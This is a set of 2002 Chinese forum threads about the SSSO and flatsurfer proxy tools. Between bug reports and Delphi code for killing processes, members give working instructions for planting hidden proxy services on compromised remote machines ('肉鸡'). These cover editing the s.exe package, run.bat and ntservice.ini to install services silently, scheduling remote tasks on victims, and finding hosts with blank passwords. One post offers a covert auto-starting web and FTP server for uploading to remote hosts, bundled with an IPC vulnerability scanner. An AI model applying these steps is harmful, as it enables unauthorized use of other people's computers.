哦，这么说来可以代替种植者了？
小开 帅哥哟，离线，有人找我吗？

等级：新手上路
文章：60
积分：159
注册：2002-10-30
1.63测试反馈：
我把乐助在顶楼提供的4个压缩包全部下载解压缩到 ssso tool目录下，替换了原文件。
然后测试代理，显示如下：
★提示:验证开始！请不要再运行其他验证！
连接 socks5 服务器错误代码:10061

然后助手那两个测试结果的按钮就变灰了，再也没有恢复。也就是说：无法测试结果。
然后我想导出结果，提示导出成功。却没有txt文件,用搜索功能也没有。也就是说：无法导出。

我的系统是win2000 ,多次测试都这样，我还关闭了防火墙。

有待改进。

2002-11-29 14:04:08
水滴 帅哥哟，离线，有人找我吗？

等级：版主
文章：31
积分：104
注册：2002-10-30
[讨论]
以下是引用小开在2002-11-29 14:04:08的发言：
1.63测试反馈：
我把乐助在顶楼提供的4个压缩包全部下载解压缩到 ssso tool目录下，替换了原文件。
然后测试代理，显示如下：
★提示:验证开始！请不要再运行其他验证！
连接 socks5 服务器错误代码:10061

然后助手那两个测试结果的按钮就变灰了，再也没有恢复。也就是说：无法测试结果。
然后我想导出结果，提示导出成功。却没有txt文件,用搜索功能也没有。也就是说：无法导出。

我的系统是win2000

我的也是，但最近做的ssso测试可以，估计是以前的跳板当服务器端时这个版本测试不了，显示“连接 socks5 服务器错误代码:10086”但实际在ssso3.61中却可以使用；　　　　＋＋另，导出的不是导出结果.txt，我的是在桌面出现了一个.txt的英文名文本文件。

2002-11-29 23:21:04
HighWind 帅哥哟，离线，有人找我吗？

等级：新手上路
文章：5
积分：56
注册：2002-12-1

在结果调度里选调用该结果会使stunnel4.03启动出错，stunnel.conf格式出错。
2002-12-1 3:09:20
拂尘子 帅哥哟，离线，有人找我吗？

等级：新手上路
文章：27
积分：87
注册：2002-10-25
1.64b安装时提示：
“★帮助提示:在当前目录下找不到数据库文件"SSSO.mdb",部分功能将无法使用！
★帮助提示:在当前目录下找不到下列文件之一："stunnel-3.22.exe、openssl.exe、openssl.cnf、libssl32.dll、libeay32.dll",部分功能将无法使用！
★帮助提示:在当前目录下找不到文件"clearlogs.exe",部分功能将无法使用！
★帮助提示:在当前目录下找不到文件"Psinfo.exe",部分功能将无法使用！“

在将旧版的所有文件复制同一目录下后仍提示：“★帮助提示:在当前目录下找不到文件"Psinfo.exe",部分功能将无法使用！“
经搜索寻找不到该文件。
在到入旧版的“结果”时，提示：“★提示:IP和Port不能为空！”
我的环境：winxp ZA MYIE Norton 。

乐助 回复：★帮助提示:在当前目录下找不到文件"Psinfo.exe",部分功能将无法使用！“
没事，这个是用来检测主机操作系统的，正式版将取消他
你的“结果”里的内容是什么格式的？
2002-12-2 21:18:46
johnchang 帅哥哟，离线，有人找我吗？

等级：新手上路
文章：12
积分：67
注册：2002-10-27

即使测试结束，关闭程序后，会剩下几个进程还在运行，名称是stunnel-3.exe，用Ctrl+Alt+Del也无法关闭，只能重起（winme)。

乐助：目前对winme和98的支持还不完善，由于精力有限，目前只考虑2000以上的系统

2002-12-2 21:22:01
QFL861 帅哥哟，离线，有人找我吗？

等级：新手上路
文章：95
积分：282
注册：2002-10-23

简化一下如何？

多线程不好调试，特别是WinSock调用，Delphi再次封装为异步与阻塞，网络环境又复杂多变。

线程中同时验证确实比较困难，是否能不开线程，顺序验证，(通过事件返回结果--可行否???)，记忆每次的state参数来排序。间隔时间很短，出入应该不大，也节约资源(win98应该也可以了---推测啦)，缩短开发周期，时间很紧啊。

[此贴子已经被作者于2002-12-2 23:10:14编辑过]
2002-12-2 23:01:24
乐助

等级：管理员
文章：150
积分：337
注册：2002-10-23

以下是引用QFL861在2002-12-2 23:01:24的发言：
简化一下如何？

多线程不好调试，特别是WinSock调用，Delphi再次封装为异步与阻塞，网络环境又复杂多变。

线程中同时验证确实比较困难，是否能不开线程，顺序验证，(通过事件返回结果--可行否???)，记忆每次的state参数来排序。间隔时间很短，出入应该不大，也节约资源(win98应该也可以了---推测啦)，缩短开发周期，时间很紧啊。

[此贴子已经被作者于2002-12-2 23:10:14编辑过]

是啊，目前采用的就是顺序验证，线程为阻塞方式，（98下是可以验证的），只是我对线程的关闭不太会：一旦程序异常关闭，将无法关闭已经计划的线程，包括进程ID的获取以及关闭，目前采用的是
.......
var sysdrc:string;
......
sysdrc:=extractfilepath(application.ExeName)+'stunnel-3.22.exe';
ExeHandle:=FindWindow(nil,pansichar(sysdrc));//返回句柄
SendMessage(ExeHandle,WM_Close,0,0);
...........

还有就是响应超时的问题。（我采用的send(skt,buf,10,0)，来验证是否连通）

白云 | 我是win2000企业版sp4，从来没有导出成功过。
乐助 | 导出结果已经改为在同目录下的"Result.txt"
拂尘子
以下是引用乐助在2002-12-2 21:47:09的发言：
★帮助提示:在当前目录下找不到文件"Psinfo.exe",部分功能将无法使用！“
没事，这个是用来检测主机操作系统的，正式版将取消他
你的“结果”里的内容是什么格式的？

“结果”就是旧版本导出的，应该是txt吧。
乐助 | 哦，我是指里面的内容的格式，很早以前是使用汉字保存的，那个结果无法导入
QFL861 关闭已经计划的线程参考......

uses
TLHelp32, Registry;
......

procedure TProcessForm.ListRunProcessID;
var
FSnapshotHandle:THandle;
FProcessEntry32: TProcessEntry32;
ProcessName: string;
Ret : BOOL;
begin
ProcessID:= -1;
ReceBufStr:= ''模块'' + LocHostNm + char($0D);
//创建系统快照
FSnapshotHandle:=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);
//先初始化 FProcessEntry32 的大小
FProcessEntry32.dwSize:=Sizeof(FProcessEntry32);
//循环枚举出系统开启的所有进程
Ret:=Process32First(FSnapshotHandle,FProcessEntry32);
while Ret do
begin//[
ProcessName:= ExtractFileName(FProcessEntry32.szExeFile);
ProcessID:= FProcessEntry32.th32ProcessID;

ReceBufStr:= ReceBufStr + IntToStr(ProcessID) + '' '' + ProcessName + char($0D);
if(CheckBox1.Checked) then
Memo1.Lines.Add(IntToStr(ProcessID) + '' '' + ProcessName);

Ret:= Process32Next(FSnapshotHandle, FProcessEntry32);
end;//]
CloseHandle(FSnapshotHandle);
end;

function TProcessForm.FindProcessID(RunVersion: char; PNameStr: string):integer;
var
FSnapshotHandle:THandle;
FProcessEntry32: TProcessEntry32;
Ret : BOOL;
TmpStr,ProcessName: string;
begin
ProcessID := -1;
if(RunVersion=''W'') then
TmpStr := PNameStr
else TmpStr := ''WINOA386.MOD''; //dos cmd for win98

//创建系统快照
FSnapshotHandle:=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);
//先初始化 FProcessEntry32 的大小
FProcessEntry32.dwSize:=Sizeof(FProcessEntry32);
//循环枚举出系统开启的所有进程
Ret:=Process32First(FSnapshotHandle,FProcessEntry32);
while Ret do
begin
ProcessName:=ExtractFileName(FProcessEntry32.szExeFile);
if ProcessName=TmpStr then
//if ProcessName=''WINOA386.MOD'' then
//if ProcessName=''ntvdm.exe'' then
begin
ProcessID := FProcessEntry32.th32ProcessID;
break;
end;
Ret:=Process32Next(FSnapshotHandle,FProcessEntry32);
end;
CloseHandle(FSnapshotHandle);
result:=ProcessID;
end;

function TProcessForm.KillProcessEntry(iID: integer): BOOL;
var
hProcess: THANDLE;
Label EndLab;
begin
if(iID=-1) then
begin result:= FALSE; goto EndLab; end;

hProcess := OpenProcess(PROCESS_ALL_ACCESS, FALSE, iID);
if (hProcess=0) then
begin result:= FALSE; goto EndLab; end;
if (not TerminateProcess (hProcess, 99)) then
begin
CloseHandle(hProcess);
begin result:= FALSE; goto EndLab; end;
end;
////// WaitForSingleObject(hProcess, INFINITE);
CloseHandle(hProcess);
result:=TRUE;

EndLab:
end;

调 用：
KillProcessEntry(FindProcessID(''W'', ''stunnel-3.22.exe''));
QFL861

线程改为为非阻塞方式如何?

乐助 ：你是说多线程并行吗？那样内存好像耗费太大。
另外，导出结果有问题的基本都是数据库是早期的所至，请重新下载试试。
还有就是庆祝flatsurfer的诞生，的确非常方便，也许可以替代SSSO了！：）

小开 保存结果时，提示：
由于其Required属性设置为真（Ture）,字段“result.ssso ip”不能包含null值。在此字段中输入一个数值。

看不懂什么意思,我的是windows2000+sp3
QFL861 | 我理解：阻塞方式=多线程并行；非阻塞方式=事件驱动(非多线程)。
小开 助手1.64很成功。
我安装了远程工具包4.2，然后下载助手1.64b，（注意，只是1.64b一个压缩包），然后把这个压缩包解压到ssso tool目录下替换SSSO-friend.exe原文件，打开助手，完全没有问题，试验各种功能，百分之99都没有问题，只是在批量验证ssso的时候，如果这个ssso是无效的，助手会象死了一样没有反应，需要重新启动助手，然后把那个无效代理删掉，在验证下一个。也就是说，批量验证不好用，虽然如此，比起以前的版本，助手已经非常好用，我很满意，谢谢乐助。推荐大家都使用。
成功导出的结果是Result.txt，如果找不到可以用搜索功能搜索到。如果你使用导入时是什么目录，导出时也会放在那个目录。

新增的按速度排序功能和自动设定远程时间很实用。

我的环境是win2000+sp3

远程工具包4.2在清心主页有下载
http://qingxin.mine.nu/software/ssssotools4.2.zip
助手1.64下载：
http://qingxin.mine.nu/software/ssso-friend-1.64b.rar
拂尘子 终于成功了！非常好用，尤其是可以批量导出导入、批量测试。谢谢乐助、谢谢小开!
如果按小开的上述指示安装后提示缺少下列文件的：
stunnel-3.22.exe、openssl.exe、openssl.cnf、libssl32.dll、libeay32.dll、clearlogs.exe、Psinfo.exe 可以在SSSO服务器端中找到
水滴 1.64b已经很好了。。但如果可以，建议做以下改进：(全是小事，使用是否方便问题)

1、使“善后处理”与“基本设置”的IP同步；
2、“结果调度”中“测试该结果”的 IP空白 仍用1.6版的长度，现在象222.222.222.222这样的全三位IP无法全部显示，不方便的；
3、点击”结果调度“中的”调用该结果“项时只修改Change Proxy的IP与端口，不要理127.0.0.1:xxxx的端口；(现在是用户不论把127.0.0.1的端口设为多少，当用调用该结果这个功能时，Change Proxy中的127.0.0.1的端口都被改回1913，用户还是得再打开它手动修改为自己设置的端口)
4、当”结果调度“中的”测试该结果”的IP空白处已有上面SSSO IP数据库中的IP时，完成一个新ssso制作后点击第四项的“验证SSSO”中的“保存该结果”时会提示“★提示:数据库中已有该IP记录！”，只有当此处为空白时，点击第四项的“验证SSSO”中的“保存该结果”才会将新做的ssso保存在数据库中。

以上四点对于我不是问题，对于更多的人可能是。。也可能是我吹毛求疵了。。
---------------------------------------------++++++++++++++++++++++++++++++++++

5555555、真是不好意思，我把这重要的一条忘了。但必须得补上：

夜猫子制作ssso注意(当然也说给乐助了），近午夜时不要用自动下达远程任务，一定要手动，为何，因为，远程夜间时差特别。远程显示：上午：12：10，实际是晚上：0：10，但自动下达会以12：11式，对方肉鸡任务清单会显示：1 下午：12：11，那么你的这个ssso是要到明天才能装上，你现在傻等着试了多少遍不能用，还以为对方网管是多高多勤快的高手呢!!! 所以半夜不要用“自动下达远程任务”，这个能不能改我不知道，乐助看吧。。。
拂尘子 | 怪不得我得端口老是莫名其妙地改动，原来如此，真要好好谢谢水滴了。这可不是吹毛求疵，愿大家都能看到你的指点才好。


清心论坛--精华专题浏览：[原创]自制SSSO＋FLATSURFER安装包

→ 浏览：[原创]自制SSSO＋FLATSURFER安装包

您是本帖的第 298 个阅读者 浏览上一篇主题 刷新本主题 树形显示贴子 　 浏览下一篇主题
* 贴子主题： [原创]自制SSSO＋FLATSURFER安装包
古风 帅哥哟，离线，有人找我吗？

等级：新手上路
文章：61
积分：199
注册：2002-11-6
楼顶
发贴心情 [原创]自制SSSO＋FLATSURFER安装包
现在，你可以自制SSSO4.2＋FLATSURFER服务器端安装包，达到一次制作可以使用两个软件的目的。如果有必要的话，你可以同时在本机运行两个软件的客户端程序，它们互不冲突。
具体是：
（1）安装完sssotool42.exe后，用创建安全证书选项（make_cert.bat）自制证书。
（2）将flatsurfer释放到一个文件夹，运行flatcert.exe生成一对证书，名字是flatcert.pk（公开钥匙）和flatcert.sk（私人钥匙）。将flatserver.exe、flatcert.pk、flatcert.sk三个文件添加到SSSO4.2的s.exe中。
（3）将s.exe中的run.bat释放出来，使用右键的编辑命令打开它，在其顶部加入以下两行：
flatserver /install /silent
net start flatservice
保存后，将run.bat添加到s.exe压缩包中。现在这个压缩包632K，还可以。
请同学们试验。
2002-12-5 12:52:51
编辑这个贴子 鲜花(0) 鸡蛋(0)
liz 帅哥哟，离线，有人找我吗？

等级：新手上路
文章：51
积分：193
注册：2002-11-4
第2楼
发贴心情
你好！请教这样做的机器是否必须是2000？

你们辛苦了，致敬、致谢！

点击查看用户来源及管理<br>发贴IP：a.b.c.d 2002-12-5 13:03:50
编辑这个贴子
aaa 帅哥哟，离线，有人找我吗？

等级：新手上路
文章：18
积分：137
注册：2002-11-13
第3楼
发贴心情
SSSO需要2000
点击查看用户来源及管理<br>发贴IP：a.b.c.d 2002-12-5 13:09:17
编辑这个贴子
李文 帅哥哟，离线，有人找我吗？

等级：管理员
文章：51
积分：187
注册：2002-10-23
第4楼
发贴心情
真聪明，很好的办法:)
点击查看用户来源及管理<br>发贴IP：a.b.c.d 2002-12-5 19:15:56
编辑这个贴子
春意 帅哥哟，离线，有人找我吗？

等级：新手上路
文章：79
积分：186
注册：2002-10-24
第5楼
发贴心情
（1）安装完sssotool42.exe后，用创建安全证书选项（make_cert.bat）自制证书。
请问是不是选择创建安全证书就自动生成证书了？
点击查看用户来源及管理<br>发贴IP：a.b.c.d 2002-12-5 19:33:37
编辑这个贴子
古风 帅哥哟，离线，有人找我吗？

等级：新手上路
文章：61
积分：199
注册：2002-11-6
第6楼
发贴心情
以下是引用春意在2002-12-5 19:33:37的发言：
（1）安装完sssotool42.exe后，用创建安全证书选项（make_cert.bat）自制证书。
请问是不是选择创建安全证书就自动生成证书了？

还要填一些内容，具体看安装包中白云的说明。
我现在想如果这两个软件都能各展所长就最好了，那就是双剑合璧，否则就没必要费这事了。至于必须是2000的问题，好象有的同学自己做的用ccproxy5.2的ssso是可以用NT的，这个我没有做过，不知是不是这样？
点击查看用户来源及管理<br>发贴IP：a.b.c.d 2002-12-5 20:09:39
编辑这个贴子
春意 帅哥哟，离线，有人找我吗？

等级：新手上路
文章：79
积分：186
注册：2002-10-24
第7楼
发贴心情
Country Name:（回答你的国家名称，必须是两个字母，如美国是US，中国是CN）
State or Province name:（回答所在的州或省的名称）
Locality Name:（回答所在城市的名称）
Organization Name:（回答所在机构、组织的名称）
Organizational Unit Name:（回答所在的部门名称）
Common Name:（回答服务器上网站的名称， [image] www.abc.com）
Email Address:（回答你的Email地址）

请问那些要填真实的？

点击查看用户来源及管理<br>发贴IP：a.b.c.d 2002-12-5 20:18:02
编辑这个贴子
古风 帅哥哟，离线，有人找我吗？

等级：新手上路
文章：61
积分：199
注册：2002-11-6
第8楼
发贴心情
以下是引用春意在2002-12-5 20:18:02的发言：
Country Name:（回答你的国家名称，必须是两个字母，如美国是US，中国是CN）
State or Province name:（回答所在的州或省的名称）
Locality Name:（回答所在城市的名称）
Organization Name:（回答所在机构、组织的名称）
Organizational Unit Name:（回答所在的部门名称）
Common Name:（回答服务器上网站的名称， [image] www.abc.com）
Email Address:（回答你的Email地址）

请问那些要填真实的？

哪一个都不需要填真实的。
点击查看用户来源及管理<br>发贴IP：a.b.c.d 2002-12-5 20:32:45
编辑这个贴子
拂尘子 帅哥哟，离线，有人找我吗？

等级：新手上路
文章：27
积分：87
注册：2002-10-25
第9楼

以下是引用古风在12/5/2002 12:52:51 PM的发言：
保存后，将run.bat添加到s.exe压缩包中。现在这个压缩包632K，还可以。
请同学们试验。

我做好以后怎么是681k,大了许多，不知正确否？我用添加并更新文件，对吗？谢谢！

点击查看用户来源及管理<br>发贴IP：a.b.c.d 2002-12-7 11:14:24
编辑这个贴子
jzx 帅哥哟，离线，有人找我吗？

等级：管理员
文章：264
积分：519
注册：2002-10-27
第10楼
发贴心情
对，我的就这样子
点击查看用户来源及管理<br>发贴IP：a.b.c.d 2002-12-7 18:23:20
编辑这个贴子
古风 帅哥哟，离线，有人找我吗？

等级：新手上路
文章：61
积分：199
注册：2002-11-6
第11楼
发贴心情
以下是引用拂尘子在12/7/2002 11:14:24 AM的发言：

我做好以后怎么是681k,大了许多，不知正确否？我用添加并更新文件，对吗？谢谢！

我用ssso4.2做的也是681k。
点击查看用户来源及管理<br>发贴IP：a.b.c.d 2002-12-7 19:21:00
编辑这个贴子
拂尘子 帅哥哟，离线，有人找我吗？

等级：新手上路
文章：27
积分：87
注册：2002-10-25
第12楼
发贴心情
请问古风，在上传s.exe文件时，远程加密ssso端口号443要改成：6711吗？
点击查看用户来源及管理<br>发贴IP：a.b.c.d 2002-12-8 0:55:16
编辑这个贴子
古风 帅哥哟，离线，有人找我吗？

等级：新手上路
文章：61
积分：199
注册：2002-11-6
第13楼
发贴心情 回复拂尘子
以下是引用拂尘子在2002-12-8 0:55:16的发言：
请问古风，在上传s.exe文件时，远程加密ssso端口号443要改成：6711吗？

不用，这个办法做出来的服务器可以两用，一是使用ssso上网，用443端口；二是使用flatsurfer上网，用6711端口。
点击查看用户来源及管理<br>发贴IP：a.b.c.d 2002-12-8 10:07:06
编辑这个贴子


精华专题浏览：自助web服务器0.6版 带ftp服务器

清心论坛 → 精华专题 → 浏览：自助web服务器0.6版 带ftp服务器

您是本帖的第 203 个阅读者
* 贴子主题： 自助web服务器0.6版 带ftp服务器
白云

等级：管理员
文章：98
积分：479
注册：2002-10-24
自助web服务器0.6版 带ftp服务器
自助web服务器0.6版（带ftp服务器） 984K 下载：http://fztd.tripod.com/r/web06.zip

把压缩包里面的web.exe上传到远程主机运行，立即产生一个隐蔽的web服务器，每次开机自动运行，主目录在system32\Myweb下，端口为90。安装后访问http://主机ip:90看看，呵呵，你的个人网站啊。注意不要在本机运行web.exe，sc.exe是删除web服务器的文件。

此版本包含完整的web服务器和ftp服务器。服务器端的所有文件只有125K。

内含Hep主页加密和Ipc漏洞扫描器。

自助web服务器0.5版（不含ftp服务器） 967K 下载：http://fztd.tripod.com/r/web05.zip

把压缩包里面的web.exe上传到远程主机运行，立即产生一个隐蔽的web服务器，每次开机自动运行，主目录在system32\Myweb下，端口为90。安装后访问http://主机ip:90看看，呵呵，你的个人网站啊。注意不要在本机运行web.exe，sc.exe是删除web服务器的文件。

善缘 | 你试了可以用吗？我用不起来，用IP地址访问不了，用127.0.0.1可以找到文件，但打不开htm文件，只能下载
白云 | 不会吧，0.1版需要用全部的文件名来访问，即http://IP:90/index.htm，0.5版不需要，只要访问http://ip:90/就可以。
善缘 | 是完整路径，但提示下载HTM文件而不是打开，不在本机根本连下载提示都没有
白云 | 你是怎么做的啊？我刚才又用0.5做了一个，完全可以啊？
水滴 | 可以打开白云的这个，显示四个大字，我的主页
白云 | 是啊，我那个是默认的首页，没有其他内容。所以我征求真相网页模板，要求内容全面简练，制作精美，总体积不超过1M。将会固化到自助web里面，安装后就是一个现成的网站。
善缘 | 奇怪，我什么也没改，安装了不行，也许是机器的问题，我再试试。支持断点续传吗？不支持我就不试了。我现在用的很小，22K，但不支持断点续传。


清心论坛--精华专题浏览：[建议]最好不要修改ssso的默认端口

→ 浏览：[建议]最好不要修改ssso的默认端口

您是本帖的第 174 个阅读者 浏览上一篇主题 刷新本主题 树形显示贴子 　 浏览下一篇主题
* 贴子主题： [建议]最好不要修改ssso的默认端口
白云 帅哥哟，离线，有人找我吗？

等级：管理员
文章：112
积分：549
注册：2002-10-24
楼顶
发贴心情 [建议]最好不要修改ssso的默认端口
socks代理1122，ssso加密代理443（备用2002）
如果改动端口，很容易被其他人覆盖，比如大家先要检查一下肉鸡的1122和443是否被占用，如果改了端口，他就会认为没有占用而安装ssso代理。我就是先看看肉鸡是否安装了ssso，安装的话我就另找肉鸡。
2002-11-9 10:44:11
编辑这个贴子 鲜花(0) 鸡蛋(0)
古风 帅哥哟，离线，有人找我吗？

等级：新手上路
文章：60
积分：194
注册：2002-11-6
第2楼
发贴心情
同意。
我说的自己修改端口是指适合的机子，指那些适合把空密码改掉以增强安全性，并且已经改了的机子，这时这台机子别人已经扫不到了。
如果连空密码都没有改或不方便改的话，改端口就很没有必要了。
2002-11-9 10:59:18
编辑这个贴子
jzx 帅哥哟，离线，有人找我吗？

等级：管理员
文章：262
积分：509
注册：2002-10-27
第3楼
发贴心情
同意
2002-11-9 13:57:13
编辑这个贴子
白云 帅哥哟，离线，有人找我吗？

等级：管理员
文章：112
积分：549
注册：2002-10-24
第4楼
发贴心情
对。为什么我不把修改端口为2002的文件做成快捷方式？为了以后的规范，我是希望大家遇到443被占用的主机时干脆放弃，另外443被占用的，可能服务器对安全要求高，不适合做ssso代理。
有好多功能不是不可以加，是不能加，比如通过程序组合，完全可以做到点击一个按钮就做到搜索肉鸡、安装ssso的全自动完成。但这样会对网络安全造成威胁。还是大家在现有水平上能做就做，不能做就不做为好。
2002-11-9 14:01:06
编辑这个贴子
jzx 帅哥哟，离线，有人找我吗？

等级：管理员
文章：262
积分：509
注册：2002-10-27
第5楼
发贴心情
好，就这样，毕竟不是只有我们在上网

2002-11-9 17:26:56
编辑这个贴子
daemon 帅哥哟，离线，有人找我吗？

等级：新手上路
文章：6
积分：88
注册：2002-10-30
第6楼

以下是引用白云在2002-11-9 14:01:06的发言：
对。为什么我不把修改端口为2002的文件做成快捷方式？为了以后的规范，我是希望大家遇到443被占用的主机时干脆放弃，另外443被占用的，可能服务器对安全要求高，不适合做ssso代理。
有好多功能不是不可以加，是不能加，比如通过程序组合，完全可以做到点击一个按钮就做到搜索肉鸡、安装ssso的全自动完成。但这样会对网络安全造成威胁。还是大家在现有水平上能做就做，不能做就不做为好。

完全同意，否则网上就乱了。好象现在台湾、韩国的主机，千疮百孔呀。

----------------------------------------------
全面放弃QQ，转入MSN MESSENGER

2002-11-12 15:00:29
编辑这个贴子


清心论坛--精华专题浏览：[讨论]请有能力的网友全面测试flatsurfer的安全性

清心论坛 → 精华专题 → 浏览：[讨论]请有能力的网友全面测试flatsurfer的安全性

您是本帖的第 262 个阅读者
* 贴子主题： [讨论]请有能力的网友全面测试flatsurfer的安全性
911 帅哥哟，离线，有人找我吗？

等级：新手上路
文章：24
积分：103
注册：2002-11-26
楼顶
发贴心情 [讨论]请有能力的网友全面测试flatsurfer的安全性
安全第一呀。

----------------------------------------------
God may be subtle, but he isn't plain mean.

------Albert Einstein

2002-12-4 17:12:52
编辑这个贴子 鲜花(0) 鸡蛋(0)
HighWind 帅哥哟，离线，有人找我吗？

等级：新手上路
文章：4
积分：51
注册：2002-12-1
第2楼
发贴心情
如何测试？
点击查看用户来源及管理<br>发贴IP：a.b.c.d 2002-12-4 18:12:39
编辑这个贴子
911 帅哥哟，离线，有人找我吗？

等级：新手上路
文章：24
积分：103
注册：2002-11-26
第3楼
发贴心情
就象以前测试snake跳板那样测试呗，查看所有的通讯数据，有没有任何可能的不安全因素。

另外问一下，如何让myie启动时自动让选项－使用代理那个地方的“对号”出现。默认启动的时候似乎是没有那个对号，要设代理还得费劲点一下。

----------------------------------------------
God may be subtle, but he isn't plain mean.

------Albert Einstein

点击查看用户来源及管理<br>发贴IP：a.b.c.d 2002-12-4 18:19:43
编辑这个贴子
myj 帅哥哟，离线，有人找我吗？

等级：新手上路
文章：7
积分：51
注册：2002-10-24
第4楼
发贴心情
911 ???? 名字起的有点敏感
点击查看用户来源及管理<br>发贴IP：a.b.c.d 2002-12-4 18:46:11
编辑这个贴子
911 帅哥哟，离线，有人找我吗？

等级：新手上路
文章：24
积分：103
注册：2002-11-26
第5楼
发贴心情
不要疑神疑鬼的，名字不就是一个代号嘛。

谁能告诉我那个关于myie问题的答案呢？

另外看了论坛“重要通知”，看来还是那句老话“安全第一”。

[此贴子已经被作者于2002-12-4 19:05:57编辑过]

----------------------------------------------
God may be subtle, but he isn't plain mean.

------Albert Einstein

点击查看用户来源及管理<br>发贴IP：a.b.c.d 2002-12-4 19:01:14
编辑这个贴子
白云 帅哥哟，离线，有人找我吗？

等级：管理员
文章：114
积分：559
注册：2002-10-24
第6楼
发贴心情
非常安全，非常安全。
和ssso一样都是只能探测到代理的ip，对于访问的ip、域名、数据等什么都不能被窥探。用Sniffer Portable 4.7做的测试。大家可以放心使用。
点击查看用户来源及管理<br>发贴IP：a.b.c.d 2002-12-4 19:19:05
编辑这个贴子
911 帅哥哟，离线，有人找我吗？

等级：新手上路
文章：24
积分：103
注册：2002-11-26
第7楼
发贴心情
多谢啦，就等你的这句话呢，另外还是那个关于myie的问题，启动时的配置似乎应该是在myie.ini那个文件里面存着，但我没看到很明显的和enable代理相关的设置。

----------------------------------------------
God may be subtle, but he isn't plain mean.

------Albert Einstein

点击查看用户来源及管理<br>发贴IP：a.b.c.d 2002-12-4 19:24:37
编辑这个贴子
白云 帅哥哟，离线，有人找我吗？

等级：管理员
文章：114
积分：559
注册：2002-10-24
第8楼
发贴心情
他是你这次关闭时保存为什么设置就下次什么设置打开。至于你说总是以默认设置打开可能你的Myie文件夹或程序是只读的属性吧？
点击查看用户来源及管理<br>发贴IP：a.b.c.d 2002-12-4 19:38:45
编辑这个贴子
水滴 帅哥哟，离线，有人找我吗？ 魔羯座1955-1-16

等级：版主
文章：29
积分：94
注册：2002-10-30
第9楼
发贴心情 [建议]
给flatsurfer作者的建议　在flatsurfer客户端界面上增加有无数据通过或是否与服务器连接的显示，这对于节约宝贵的时间非常有用啊。

JAP、跳板、SSSO都有，但跳板的最好，一眼就可判断出是否有数据通过（甚至快慢）、远端跳板是否可用，这个方便致使跳板传遍了各大论坛。

[此贴子已经被作者于12/7/2002 3:05:14 PM编辑过]
点击查看用户来源及管理<br>发贴IP：a.b.c.d 2002-12-6 17:21:20
编辑这个贴子
水滴 帅哥哟，离线，有人找我吗？ 魔羯座1955-1-16

等级：版主
文章：29
积分：94
注册：2002-10-30
第10楼
发贴心情 [原创]
这是一位网友在短信中委托我代为转发出来的。希望对大家有帮助，在此谢谢他^_^。以下内容全部出自这位网友。。
-------------------------------------------------------------------------------------------------
flatsurf似乎确实不能通过http代理出去，不过通过socks5却毫无问题，所以想级连的可以用snake的跳板来实现级连。不过大家似乎都不太信得过snake的跳板，那我们就用bouncer来自己做socks5代理，方法很简单：

在做跳板的那个s.exe里面只保留bouncer.exe, hiderun.exe, ntservice.exe, ntservice.ini, run.bat五个文件，修改ntservice.ini如下：
[Settings]
ServiceName = NTService
LogEnable = 0
ProcCount = 1
[Process0]
CommandLine = bouncer --port 1081 --socks5 --s_user username --s_password password
PauseStart = 1000
PauseEnd = 1000
UserInterface = No
修改run.bat如下：
if not exist NTservice.exe goto A
net stop ntservice
NTService.exe -uninstall

:A
NTService.exe -install
net start NTService
然后上传执行，完全属于自己的（user/pass保护，自定义端口）socks5代理就ok了。当然上面的修改完全是照猫画虎，有什么纰漏大家请指出。

[此贴子已经被作者于12/7/2002 3:13:16 PM编辑过]
点击查看用户来源及管理<br>发贴IP：a.b.c.d 2002-12-7 15:08:08
编辑这个贴子
古风 帅哥哟，离线，有人找我吗？

等级：新手上路
文章：61
积分：199
注册：2002-11-6
第11楼
发贴心情
以下是引用水滴在12/7/2002 3:08:08 PM的发言：
这是一位网友在短信中委托我代为转发出来的。希望对大家有帮助，在此谢谢他^_^。以下内容全部出自这位网友。。
[此贴子已经被作者于12/7/2002 3:13:16 PM编辑过]

我是用cjproxychain建立的http代理链，建链时用的地址就是flatsurfer服务器地址，从中取出的http代理就可以使用在flatsurfer客户端。
点击查看用户来源及管理<br>发贴IP：a.b.c.d 2002-12-7 16:26:13
编辑这个贴子


清心论坛--精华专题浏览：[原创]ssso中s.exe的修改方法

→ 浏览：[原创]ssso中s.exe的修改方法

您是本帖的第 263 个阅读者
* 贴子主题： [原创]ssso中s.exe的修改方法
古风 帅哥哟，离线，有人找我吗？

等级：新手上路
文章：60
积分：194
注册：2002-11-6
楼顶
发贴心情 [原创]ssso中s.exe的修改方法
一、SSL默认端口修改（将默认端口443改为其它任意端口）：将NTService.ini中的第六行的443改为其它值，
你在用客户端时也要把运行ghip.bat后stunnel.conf文件中的第四行的端口改成上面的值。
二、socks5默认端口修改（将默认端口1122改为其它任意端口）：将NTService.ini中的第六行的1122改为
其它值xxx；将az.bat中的第二行1122同样改为xxx。
三、自制证书添加（将自制证书保存在一个地方，不必在每次推出新版本时重新制作证书，而只需
添加至s.exe中即可）
四、服务器端跳板阶联（如果使用者有不只一个跳板，在上传s.exe之前，可以设定下一跳板，增加安全性）：
在az.bat文件中的第二行下插入一行－－msservice -config myserver add ip port y（ip和port为另外一
个跳板的地址和socks5服务端口号）
以上内容我都做过，只是惭愧不会做程序，建议白云做一个修改服务器安装程序s.exe的小程序，可以类似
SSSO－FRIEND的界面，我想这样大家又可以省些事了。
2002-11-6 17:53:19
编辑这个贴子 鲜花(0) 鸡蛋(0)
潇雨寒 帅哥哟，离线，有人找我吗？

等级：新手上路
文章：2
积分：57
注册：2002-11-8
第2楼
发贴心情
NTService.ini
这个文件在哪啊
2002-11-9 11:13:08
编辑这个贴子
jzx 帅哥哟，离线，有人找我吗？

等级：管理员
文章：262
积分：509
注册：2002-10-27
第3楼
发贴心情
在s.exe里面，用winrar打开s.exe。注意不是点击打开，而是按右健，然后选择用rar打开。你就可以看到了。
2002-11-9 13:21:49
编辑这个贴子
沧海一粟 帅哥哟，离线，有人找我吗？

等级：论坛游民
文章：101
积分：288
注册：2002-10-23
第4楼
发贴心情
"msservice -config myserver add ip port"---我没有加“y”，加“y”反而不行。
2002-11-12 17:19:56
编辑这个贴子
小开 帅哥哟，离线，有人找我吗？

等级：新手上路
文章：55
积分：134
注册：2002-10-30
第5楼
发贴心情
我对自制证书不明白：
1，都说做证书更安全，能不能把个中道理说明白些，证书到底是干什么用的？证书到底了什么作用？
2，做证书要求输入自己的个人资料，这岂不是更不安全？
3，要求我输入个人资料时，我一律回答了aa,包括国家、单位、email地址我都回答了aa,是不是因此使s.exe失效？

